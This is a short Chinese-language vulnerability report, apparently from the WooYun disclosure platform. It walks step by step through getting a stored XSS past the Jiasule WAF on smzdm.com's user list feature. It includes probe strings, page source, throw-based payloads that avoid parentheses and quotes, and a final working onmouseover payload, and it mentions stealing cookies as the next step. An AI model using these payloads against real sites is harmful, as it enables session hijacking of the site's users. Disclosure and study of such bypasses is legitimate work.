WooYun.org

之前已经说过了加速乐做了反射型XSS的防御，在储存型XSS测试过程中发现也过滤了一些关键字
1.创建我的清单 http://www.smzdm.com/user/qingdan
2.编辑清单进行测试 abcde<(")[']#\/=;> 反回 abcde 看来尖括号已经被过滤了

3.继续测试 abcde(")[']#/=; 返回 abcde(")[']#/=; 没有过滤
4.但怎么利用呢？查看源码处，

<a title="赞" id="love_rating_9_4116" class="zan" href="javascript:void(0);" onclick="ajax_love(4116,9,this);ga('send', 'event','值友清单','详情_赞','4116_abcde(\")[\']#/=;');"><i class="icon-zan"><!--[if lt IE 8]>赞<![endif]--></i><span class="scoredInfo">已赞</span><span class="addNumber add">+1</span></a>

5.按赞的地方没有过滤所以我们可以写代码，用 onmouseover 当鼠标点赞时触发
6.不过事情往往不是想象中那么简单的
7.插个代码试试

ssx" onmouseover=alert();

8.报错，测试发现拦截了与()关联语句

9.既然过滤了圆括号，那我们用 throw 抛出异常吧
先看看 throw 的构造语句是如何的

<img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw'=alert\x282\x29';>

10.实际上直接插进去并不成功，为什么呢，从返回的源代码我们清晰看到问题
' 和 " 都被转换成了

\' 和 \"

\\
11.至此 <>尖括号，() 圆括号，' 单引号，" 双引号 都被过滤了，我们是不是要就此放弃呢
12.山重水复疑无路，柳暗花明又一村
13.我们就用 [] 来方括号来完成这次测试，成功弹框，注意 ] 后面要加空格用以隔离后面的代码

ssx" onmouseover=javascript:window.onerror=alert;throw[/xss/]

14.然后就是抓 cookie 了

15.已领取到厂商上次发来的礼物，如果可以给个高rank，充值点话费什么的，谢谢了